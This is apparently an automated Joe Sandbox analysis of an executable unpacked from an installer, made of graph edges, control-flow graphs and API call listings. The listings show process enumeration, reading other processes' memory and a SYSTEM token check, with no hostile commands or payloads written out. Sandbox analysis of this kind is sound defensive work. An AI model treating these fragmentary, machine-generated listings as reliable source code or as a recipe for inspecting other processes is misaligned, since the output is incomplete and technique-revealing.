moneypunct LocalAlloc 34226->34232 34233 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34227->34233 34234 b48ad9 34228->34234 34236 b48a35 34229->34236 34240 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34230->34240 34231->34242 34246 b48e5f 34232->34246 34247 b48d15 34233->34247 34248 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34234->34248 34237 b48e89 34235->34237 34238 b36330 moneypunct LocalAlloc 34236->34238 34249 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34237->34249 34250 b48a3e 34238->34250 34239->34241 34251 b48e1e 34240->34251 34241->34189 34241->34190 34242->34183 34242->34241 34252 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34243->34252 34244 b48db4 34259 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34244->34259 34245->34244 34253 b430e1 numpunct 46 API calls 34245->34253 34254 b48e72 34246->34254 34260 b43073 codecvt 41 API calls 34246->34260 34255 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34247->34255 34256 b48ae1 34248->34256 34249->34212 34269 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34250->34269 34257 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34251->34257 34258 b48c16 34252->34258 34253->34244 34262 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34254->34262 34261 b48d22 34255->34261 34263 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34256->34263 34264 b48e2b 34257->34264 34265 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34258->34265 34266 b48dc4 34259->34266 34260->34254 34267 b42837 std::locale::_Locimp::_Makeushloc 72 API calls 34261->34267 34262->34212 34268 b48aee 34263->34268 34270 b42f33 std::locale::_Locimp::_Makeushloc 72 API calls 34264->34270 34271 b48c23 34265->34271 34272 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34266->34272 34273 b48d2c 34267->34273 34274 b42d74 std::locale::_Locimp::_Makeushloc 74 API calls 34268->34274 34276 b48a5b 34269->34276 34277 b48e35 34270->34277 34278 b36330 moneypunct LocalAlloc 34271->34278 34279 b48dd1 34272->34279 34280 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34273->34280 34275 b48af8 34274->34275 34281 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34275->34281 34282 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34276->34282 34283 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34277->34283 34284 b48c2c 34278->34284 34285 b36330 moneypunct LocalAlloc 34279->34285 34286 b48d34 34280->34286 34281->34288 34289 b48a68 34282->34289 34283->34290 34298 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34284->34298 34291 b48ddb 34285->34291 34287 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34286->34287 34292 b48d41 34287->34292 34288->34163 34293 b36330 moneypunct LocalAlloc 34289->34293 34290->34200 34290->34212 34294 b48dfb 34291->34294 34295 b4869e std::locale::_Locimp::_Makeushloc 42 API calls 34291->34295 34296 b429f6 std::locale::_Locimp::_Makeushloc 74 API calls 34292->34296 34297 b48a72 34293->34297 34300 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34294->34300 34295->34294 34299 b48d4b 34296->34299 34301 b48a9b 34297->34301 34304 b48555 std::locale::_Locimp::_Makeushloc 44 API calls 34297->34304 34302 b48c49 34298->34302 34303 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34299->34303 34300->34290 34308 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34301->34308 34305 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34302->34305 34307 b48d53 34303->34307 34304->34301 34306 b48c56 34305->34306 34309 b36330 moneypunct LocalAlloc 34306->34309 34310 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34307->34310 34308->34288 34311 b48c60 34309->34311 34312 b48d60 34310->34312 34313 b48c8c 34311->34313 34315 b48386 moneypunct 44 API calls 34311->34315 34314 b42961 std::locale::_Locimp::_Makeushloc 74 API calls 34312->34314 34317 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34313->34317 34316 b48d6a 34314->34316 34315->34313 34318 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34316->34318 34319 b48ca4 34317->34319 34318->34190 34320 b38c20 std::locale::_Locimp::_Makeushloc 9 API calls 34319->34320 34321 b48cb1 34320->34321 34322 b36330 moneypunct LocalAlloc 34321->34322 34323 b48cbb 34322->34323 34324 b48ce8 34323->34324 34325 b48386 moneypunct 44 API calls 34323->34325 34326 b3f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34324->34326 34325->34324 34326->34190 34327->33767 34328->33780 34329->33787 34330->33763 34331->33785 34332->33798 34333->33772 34334->33790 34335->33808 34336->33813 34337->33817 34338->33822 34339->33826 34340->33828 34341->33829 34342->33832 34343->33786 34344->33799 34345->33805 34346->33812 34347->33816 34348->33819 34349->33823 34350->33832 34351->33774 34352->33795 34353->33765 34354->33797 34355->33765 34357 b3c240 std::invalid_argument::invalid_argument 41 API calls 34356->34357 34358 b3d29d 34357->34358 34359 b53e5a 34358->34359 34360 b53e74 34359->34360 34361 b53ea1 RaiseException 34359->34361 34360->34361 34361->33837 34363 b35d6e 34362->34363 34365 b35d7d 34363->34365 34386 b34a10 41 API calls 4 library calls 34363->34386 34365->33480 34367 b359f8 34366->34367 34371 b35a03 34366->34371 34368 b35d30 41 API calls 34367->34368 34369 b35a01 34368->34369 34369->33486 34370 b32310 56 API calls 34372 b35a1a 34370->34372 34371->34370 34371->34372 34387 b35a60 42 API calls 34372->34387 34388 b57869 34374->34388 34378 b35971 34377->34378 34379 b3572d 34377->34379 34378->34379 34380 b35981 CloseHandle 34378->34380 34379->33519 34380->34379 34381->33504 34382->33492 34383->33495 34384->33500 34386->34365 34387->34369 34393 b57078 34388->34393 34394 b57096 34393->34394 34400 b5708f 34393->34400 34394->34400 34438 b657cc 41 API calls 3 library calls 34394->34438 34396 b570b7 34439 b65ab7 41 API calls __Getctype 34396->34439 34398 b570cd 34440 b65b15 41 API calls __cftoe 34398->34440 34401 b576d9 34400->34401 34402 b576f3 34401->34402 34403 b57709 ___crtCompareStringW 34401->34403 34441 b57370 14 API calls __dosmaperr 34402->34441 34403->34402 34406 b57720 34403->34406 34405 b576f8 34442 b57017 41 API calls __cftoe 34405->34442 34410 b57702 34406->34410 34443 b65c2a 6 API calls 2 library calls 34406->34443 34409 b5776e 34411 b5778f 34409->34411 34412 b57778 34409->34412 34413 b52937 __ehhandler$___std_fs_copy_file@12 5 API calls 34410->34413 34415 b577a5 34411->34415 34416 b57794 34411->34416 34444 b57370 14 API calls __dosmaperr 34412->34444 34417 b353d3 34413->34417 34418 b57826 34415->34418 34421 b577cc 34415->34421 34426 b577b9 __alloca_probe_16 34415->34426 34446 b57370 14 API calls __dosmaperr 34416->34446 34417->33484 34417->33490 34451 b57370 14 API calls __dosmaperr 34418->34451 34419 b5777d 34445 b57370 14 API calls __dosmaperr 34419->34445 34447 b65bdc 15 API calls 2 library calls 34421->34447 34424 b5782b 34452 b57370 14 API calls __dosmaperr 34424->34452 34426->34418 34431 b577e6 34426->34431 34428 b577d2 34428->34418 34428->34426 34429 b57813 34453 b52326 14 API calls ~ctype 34429->34453 34448 b65c2a 6 API calls 2 library calls 34431->34448 34433 b57802 34434 b57809 34433->34434 34435 b5781a 34433->34435 34449 b5b762 41 API calls 2 library calls 34434->34449 34450 b57370 14 API calls __dosmaperr 34435->34450 34438->34396 34439->34398 34440->34400 34441->34405 34442->34410 34443->34409 34444->34419 34445->34410 34446->34405 34447->34428 34448->34433 34449->34429 34450->34429 34451->34424 34452->34429 34453->34410

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 b34ba0-b34bf1 call b357c0 3 b34bf3-b34c10 call b352f0 0->3 4 b34c15-b34c4d CoInitialize CoCreateInstance 0->4 12 b35190-b351aa call b52937 3->12 6 b34c58-b34ca6 VariantInit 4->6 7 b34c4f-b34c53 4->7 17 b34cb1-b34cd5 IUnknown_QueryService 6->17 18 b34ca8-b34cac 6->18 9 b35169-b35172 7->9 10 b35174-b35176 9->10 11 b3517a-b35185 9->11 10->11 14 b35187 CoUninitialize 11->14 15 b3518d 11->15 14->15 15->12 21 b34ce0-b34cfa 17->21 22 b34cd7-b34cdb 17->22 20 b3514b-b35154 18->20 23 b35156-b35158 20->23 24 b3515c-b35167 VariantClear 20->24 28 b34d05-b34d26 21->28 29 b34cfc-b34d00 21->29 25 b3513a-b35143 22->25 23->24 24->9 25->20 27 b35145-b35147 25->27 27->20 33 b34d31-b34d4f IUnknown_QueryInterface_Proxy 28->33 34 b34d28-b34d2c 28->34 30 b35129-b35132 29->30 30->25 32 b35134-b35136 30->32 32->25 36 b34d51-b34d55 33->36 37 b34d5a-b34d74 33->37 35 b35118-b35121 34->35 35->30 38 b35123-b35125 35->38 39 b35107-b35110 36->39 42 b34d76-b34d7a 37->42 43 b34d7f-b34d9d IUnknown_QueryInterface_Proxy 37->43 38->30 39->35 40 b35112-b35114 39->40 40->35 44 b350f6-b350ff 42->44 45 b34da8-b34dc0 CoAllowSetForegroundWindow 43->45 46 b34d9f-b34da3 43->46 44->39 47 b35101-b35103 44->47 49 b34dc2-b34dc4 45->49 50 b34e28-b34e35 SysAllocString 45->50 48 b350e5-b350ee 46->48 47->39 48->44 54 b350f0-b350f2 48->54 51 b34dca-b34ded SysAllocString 49->51 52 b34e3b 50->52 53 b351ba-b35201 call b311d0 50->53 55 b34df8-b34e1b SysAllocString 51->55 56 b34def-b34df2 51->56 52->51 64 b35203-b35205 53->64 65 b35209-b35217 53->65 54->44 59 b34e3d-b34ebf VariantInit 55->59 60 b34e1d-b34e20 55->60 56->55 58 b351b0-b351b5 call b3cf40 56->58 58->53 67 b34ec1-b34ec5 59->67 68 b34eca-b34ece 59->68 60->58 63 b34e26 60->63 63->59 64->65 69 b350a0-b350df VariantClear * 4 SysFreeString 67->69 70 b34ed4 68->70 71 b3509c 68->71 69->48 72 b34ed6-b34f0c 70->72 71->69 73 b34f10-b34f19 72->73 73->73 74 b34f1b-b34fa2 call b324c0 call b312f0 call b33860 call b32e60 * 2 73->74 85 b34fa4-b34fa8 74->85 86 b34faa 74->86 87 b34fb1-b34fb3 85->87 86->87 88 b35036-b35046 87->88 89 b34fb9-b34fc3 87->89 90 b35048-b35057 88->90 91 b3508d-b35096 88->91 92 b34fd5-b35009 OpenProcess WaitForSingleObject 89->92 93 b34fc5-b34fd3 call b34270 89->93 96 b3506a-b3506c 90->96 97 b35059-b35064 90->97 91->71 91->72 94 b35013-b35023 92->94 95 b3500b-b3500d GetExitCodeProcess 92->95 93->92 94->88 100 b35025-b3502c CloseHandle 94->100 95->94 102 b35075-b35086 96->102 103 b3506e-b3506f LocalFree 96->103 97->96 101 b351ab call b57027 97->101 100->88 101->58 102->91 103->102
                                                                                    APIs
                                                                                      • Part of subcall function 00B357C0: GetCurrentProcess.KERNEL32(00000008,?,5D8D6CBB,?,-00000010), ref: 00B357D0
                                                                                      • Part of subcall function 00B357C0: OpenProcessToken.ADVAPI32(00000000), ref: 00B357D7
                                                                                    • CoInitialize.OLE32(00000000), ref: 00B34C15
                                                                                    • CoCreateInstance.OLE32(00B772B0,00000000,00000004,00B85104,00000000,?), ref: 00B34C45
                                                                                    • CoUninitialize.OLE32 ref: 00B35187
                                                                                    • _com_issue_error.COMSUPP ref: 00B351B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                    • String ID:
                                                                                    • API String ID: 928366108-0
                                                                                    • Opcode ID: f7dcb6bfa938d0bd1f85a2d44f2bb7fa786f207b12fbd93e11a17100e1c05868
                                                                                    • Instruction ID: c9ac8c6b60c5ef7e9e3fb969da90eec214b799573a9e473f6cceff732dc408b1
                                                                                    • Opcode Fuzzy Hash: f7dcb6bfa938d0bd1f85a2d44f2bb7fa786f207b12fbd93e11a17100e1c05868
                                                                                    • Instruction Fuzzy Hash: 40226E70A04388DFEB21CFA8C948BADBBF4EF55304F2481D9E409EB291DB759A45CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 105 b33c20-b33c9c call b336d0 108 b33ca2-b33cb0 GetProcAddress 105->108 109 b33f40-b33f78 105->109 110 b33cb6-b33cd0 NtQueryInformationProcess 108->110 111 b33f34-b33f3a GetLastError 108->111 112 b33f8b-b33fa7 call b52937 109->112 113 b33f7a 109->113 110->109 114 b33cd6-b33d11 call b54080 ReadProcessMemory 110->114 111->109 115 b33f7b-b33f81 FreeLibrary 113->115 120 b33d13-b33d2c 114->120 121 b33d5b-b33d8a call b54080 ReadProcessMemory 114->121 115->112 122 b33d36-b33d4f 120->122 126 b33db1-b33db7 121->126 127 b33d8c-b33daf 121->127 122->112 124 b33d55-b33d56 122->124 124->115 128 b33dd7-b33e13 126->128 129 b33db9-b33dd2 126->129 127->122 130 b33e15-b33e29 128->130 131 b33e2b-b33e36 128->131 129->122 132 b33e95-b33ed8 ReadProcessMemory 130->132 133 b33e83-b33e90 call b31bd0 131->133 134 b33e38-b33e57 131->134 138 b33ef7-b33f2f call b32e60 132->138 139 b33eda-b33ef2 call b32e60 132->139 133->132 135 b33e72-b33e81 134->135 136 b33e59-b33e6c 134->136 135->132 136->135 138->111 139->138
                                                                                    APIs
                                                                                      • Part of subcall function 00B336D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B33735
                                                                                      • Part of subcall function 00B336D0: _wcschr.LIBVCRUNTIME ref: 00B337C6
                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00B33CA8
                                                                                    • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 00B33CC4
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B33D01
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00B33D7A
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00B33EB1
                                                                                    • GetLastError.KERNEL32 ref: 00B33F34
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B33F7B
                                                                                    Strings
                                                                                    • NtQueryInformationProcess, xrefs: 00B33CA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MemoryRead$AddressDirectoryErrorFreeInformationLastLibraryProcQuerySystem_wcschr
                                                                                    • String ID: NtQueryInformationProcess
                                                                                    • API String ID: 847666571-2781105232
                                                                                    • Opcode ID: 5e56071a66059bf5902eea2626ea6f3b4eca0908432123b1c7cd884244ea7325
                                                                                    • Instruction ID: 44ae5000ad82457d2f847f0b6b9ec987ec29a80597bdf106eaf56a2820f53054
                                                                                    • Opcode Fuzzy Hash: 5e56071a66059bf5902eea2626ea6f3b4eca0908432123b1c7cd884244ea7325
                                                                                    • Instruction Fuzzy Hash: 9EA15A70904759DEDB20DF64CC49BAEBBF0EF48704F204599D449A7290EBB5AA88CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 240 b33860-b338e5 CreateToolhelp32Snapshot 241 b338e7-b3391f CloseHandle 240->241 242 b3393e-b33967 call b54080 Process32FirstW 240->242 243 b33925-b33939 241->243 244 b33b2c-b33b50 call b52937 241->244 249 b33ab6-b33aed 242->249 250 b3396d 242->250 254 b33b22 243->254 252 b33aef-b33af6 CloseHandle 249->252 253 b33afd-b33b0c 249->253 255 b33970-b33993 OpenProcess 250->255 252->253 253->244 256 b33b0e-b33b1e 253->256 254->244 257 b339a6-b339dc call b33c20 255->257 258 b33995-b339a1 255->258 256->254 264 b339e3-b339ec 257->264 259 b33a8e-b33a94 FindCloseChangeNotification 258->259 261 b33a9b-b33aaa Process32NextW 259->261 261->255 263 b33ab0-b33ab3 261->263 263->249 264->264 265 b339ee-b33a1b call b324c0 264->265 268 b33b51-b33b56 call b3d305 265->268 269 b33a21-b33a54 call b344a0 call b32e60 * 2 265->269 277 b33a56-b33a59 269->277 278 b33a7e-b33a8b 269->278 279 b33a5b-b33a66 277->279 280 b33a68-b33a7b call b340b0 277->280 278->261 281 b33a8d 278->281 279->278 280->278 281->259
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B338CB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B3390B
                                                                                    • Process32FirstW.KERNEL32(?,00000000), ref: 00B3395F
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B3397A
                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B33A8E
                                                                                    • Process32NextW.KERNEL32(?,00000000), ref: 00B33AA2
                                                                                    • CloseHandle.KERNEL32(?), ref: 00B33AF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$HandleProcess32$ChangeCreateFindFirstNextNotificationOpenProcessSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 2156003543-0
                                                                                    • Opcode ID: 34ee41fa0322803495ab2f2138ae40da1501354bd02592cccebb0818d5ec82fc
                                                                                    • Instruction ID: 5b246db52bd42779f4f38002ea7ed34eebb840ae178250f84e827dc368862ce0
                                                                                    • Opcode Fuzzy Hash: 34ee41fa0322803495ab2f2138ae40da1501354bd02592cccebb0818d5ec82fc
                                                                                    • Instruction Fuzzy Hash: B7A10BB5901259EFDF10CFA9D988BDEBBF8FF48704F244199E805AB290D7745A44CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 285 b36a50-b36a82 286 b36aa3-b36add GetCurrentProcess OpenProcessToken 285->286 287 b36a84-b36aa2 call b52937 285->287 291 b36b09-b36b1e call b35de0 286->291 292 b36adf-b36af2 286->292 299 b36b20-b36b2c call b31770 291->299 300 b36b2e-b36b30 291->300 293 b36b02-b36b04 292->293 294 b36af4-b36afb CloseHandle 292->294 296 b36c24-b36c2b call b357c0 293->296 294->293 305 b36c31-b36c35 296->305 306 b36ddb-b36e06 call b32310 296->306 299->292 303 b36b32-b36b3d call b31770 300->303 304 b36b3f-b36ba5 call b35f40 call b324c0 300->304 303->292 321 b36ba7-b36ba9 304->321 322 b36bdb 304->322 305->306 310 b36c3b-b36c3d 305->310 317 b36f96-b36fa0 call b311d0 306->317 318 b36e0c-b36e2b call b346f0 306->318 310->306 315 b36c43-b36c59 call b32310 310->315 315->317 329 b36c5f-b36c7e call b346f0 315->329 338 b36e59-b36e6a call b32310 318->338 339 b36e2d-b36e2f 318->339 326 b36c88-b36c8a 321->326 327 b36baf-b36bb8 321->327 328 b36bdd-b36c14 call b32e60 * 2 call b31770 322->328 326->328 327->322 332 b36bba-b36bbc 327->332 328->296 362 b36c16-b36c1d FindCloseChangeNotification 328->362 353 b36c80-b36c82 329->353 354 b36cad-b36cc9 call b32310 329->354 335 b36bbf 332->335 335->322 340 b36bc1-b36bc4 335->340 338->317 358 b36e70-b36e8c call b346f0 338->358 343 b36e31-b36e33 339->343 344 b36e35-b36e3a 339->344 340->326 345 b36bca-b36bd9 340->345 349 b36e4f-b36e54 call b34ac0 343->349 350 b36e40-b36e49 344->350 345->322 345->335 349->338 350->350 356 b36e4b-b36e4d 350->356 360 b36c84-b36c86 353->360 361 b36c8f-b36c91 353->361 354->317 369 b36ccf-b36ceb call b346f0 354->369 356->349 373 b36eb9-b36ec6 call b32310 358->373 374 b36e8e-b36e90 358->374 363 b36ca3-b36ca8 call b34ac0 360->363 364 b36c94-b36c9d 361->364 362->296 363->354 364->364 367 b36c9f-b36ca1 364->367 367->363 383 b36d19-b36d26 call b32310 369->383 384 b36ced-b36cef 369->384 373->317 388 b36ecc-b36ee8 call b346f0 373->388 376 b36e92-b36e94 374->376 377 b36e96-b36e9b 374->377 380 b36eaf-b36eb4 call b34ac0 376->380 381 b36ea0-b36ea9 377->381 380->373 381->381 386 b36eab-b36ead 381->386 383->317 397 b36d2c-b36d48 call b346f0 383->397 389 b36cf1-b36cf3 384->389 390 b36cf5-b36cfa 384->390 386->380 401 b36f10-b36f47 call b352f0 388->401 402 b36eea-b36eec 388->402 391 b36d0f-b36d14 call b34ac0 389->391 392 b36d00-b36d09 390->392 391->383 392->392 395 b36d0b-b36d0d 392->395 395->391 411 b36d70-b36d85 call b34ba0 397->411 412 b36d4a-b36d4c 397->412 416 b36f51-b36f65 401->416 417 b36f49-b36f4c 401->417 404 b36ef2-b36ef4 402->404 405 b36eee-b36ef0 402->405 409 b36ef7-b36f00 404->409 408 b36f06-b36f0b call b34ac0 405->408 408->401 409->409 414 b36f02-b36f04 409->414 423 b36d8a-b36da4 411->423 418 b36d52-b36d54 412->418 419 b36d4e-b36d50 412->419 414->408 420 b36f67-b36f6a 416->420 421 b36f6f-b36f76 416->421 417->416 422 b36d57-b36d60 418->422 424 b36d66-b36d6b call b34ac0 419->424 420->421 426 b36f79-b36f84 421->426 422->422 425 b36d62-b36d64 422->425 428 b36da6-b36da9 423->428 429 b36dae-b36dc2 423->429 424->411 425->424 430 b36f86-b36f89 426->430 431 b36f8e 426->431 428->429 432 b36dc4-b36dc7 429->432 433 b36dcc-b36dd6 429->433 430->431 431->317 432->433 433->426
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00B36AC8
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B36AD5
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B36AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCurrentHandleOpenToken
                                                                                    • String ID: S-1-5-18
                                                                                    • API String ID: 4052875653-4289277601
                                                                                    • Opcode ID: aa9d8295ff484c8bd07b87e199cb4daf31cbddb467c24a66ad273612f7132748
                                                                                    • Instruction ID: 2b32d19722d12caf4d9911887d13117a10355ff66afd1ee278d51c6c456383a5
                                                                                    • Opcode Fuzzy Hash: aa9d8295ff484c8bd07b87e199cb4daf31cbddb467c24a66ad273612f7132748
                                                                                    • Instruction Fuzzy Hash: C802A070901259EFDF14DFA4C955BAEBBF5EF45314F2486D8D802AB291EB30AE05CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 144 b39730-b39781 call b40c94 147 b39783 144->147 148 b39785-b397e3 call b40ed6 144->148 147->148 151 b397e9-b3980c call b3f544 148->151 152 b398ff-b3998c call b3d362 call b40df9 call b38040 call b39730 148->152 157 b39810-b39814 151->157 178 b39991-b3999e 152->178 160 b39830-b39832 157->160 161 b39816-b39818 157->161 165 b39835-b39837 160->165 163 b3981a-b39820 161->163 164 b3982c-b3982e 161->164 163->160 167 b39822-b3982a 163->167 164->165 168 b39839-b3983d 165->168 169 b3983f-b3984a call b3f57a 165->169 167->157 167->164 172 b398b7-b398d5 call b39510 168->172 173 b3984f-b39860 169->173 184 b398d7-b398e8 172->184 185 b398eb-b398f5 172->185 176 b39862 173->176 177 b39864-b3986c 173->177 176->177 180 b398b4 177->180 181 b3986e-b39870 177->181 182 b399a0-b399ab 178->182 183 b399c5-b399f2 call b52937 178->183 180->172 186 b39872-b39878 call b56c83 181->186 187 b3987b-b39884 181->187 188 b399ba-b399bc 182->188 189 b399ad-b399b8 182->189 185->152 200 b398f7-b398fb 185->200 186->187 187->180 193 b39886-b3988b 187->193 188->183 194 b399be-b399bf LocalFree 188->194 189->188 192 b399f5-b39a87 call b57027 189->192 205 b39a89-b39a8d 192->205 206 b39a8f-b39a95 192->206 198 b39896-b398a7 call b5b7c6 193->198 199 b3988d 193->199 194->183 198->180 209 b398a9-b398b1 call b541e0 198->209 202 b39890-b39894 199->202 200->152 202->198 202->202 208 b39a99-b39a9e 205->208 206->208 211 b39aa0-b39aac 208->211 209->180 213 b39ae0-b39aea call b31bd0 211->213 214 b39aae-b39ac6 211->214 218 b39aef-b39b15 call b61144 213->218 215 b39ad8-b39ade 214->215 216 b39ac8-b39ad5 214->216 215->218 216->215 221 b39b17-b39b19 218->221 222 b39b1b-b39b22 218->222 221->211 223 b39b24-b39b2a 222->223 224 b39b2c-b39b2f 222->224 225 b39b32-b39b43 223->225 224->225 226 b39b45-b39b4a 225->226 227 b39b94-b39bcb call b32e60 call b52937 225->227 228 b39b89 226->228 229 b39b4c-b39b52 226->229 233 b39b8d-b39b92 228->233 231 b39b71-b39b79 229->231 232 b39b54-b39b5b 229->232 237 b39b7c-b39b87 231->237 232->231 235 b39b5d-b39b6f 232->235 233->226 233->227 235->237 237->228 237->233
                                                                                    APIs
                                                                                    • std::locale::_Init.LIBCPMT ref: 00B39763
                                                                                      • Part of subcall function 00B40C94: __EH_prolog3.LIBCMT ref: 00B40C9B
                                                                                      • Part of subcall function 00B40C94: std::_Lockit::_Lockit.LIBCPMT ref: 00B40CA6
                                                                                      • Part of subcall function 00B40C94: std::locale::_Setgloballocale.LIBCPMT ref: 00B40CC1
                                                                                      • Part of subcall function 00B40C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00B40D17
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3978A
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B397F0
                                                                                    • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00B3984A
                                                                                      • Part of subcall function 00B3F57A: __EH_prolog3.LIBCMT ref: 00B3F581
                                                                                      • Part of subcall function 00B3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B3F5C8
                                                                                      • Part of subcall function 00B3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B3F620
                                                                                      • Part of subcall function 00B3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B3F654
                                                                                      • Part of subcall function 00B3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00B3F6A8
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,00B854B1,00000000), ref: 00B399BF
                                                                                    • __cftoe.LIBCMT ref: 00B39B0B
                                                                                    Strings
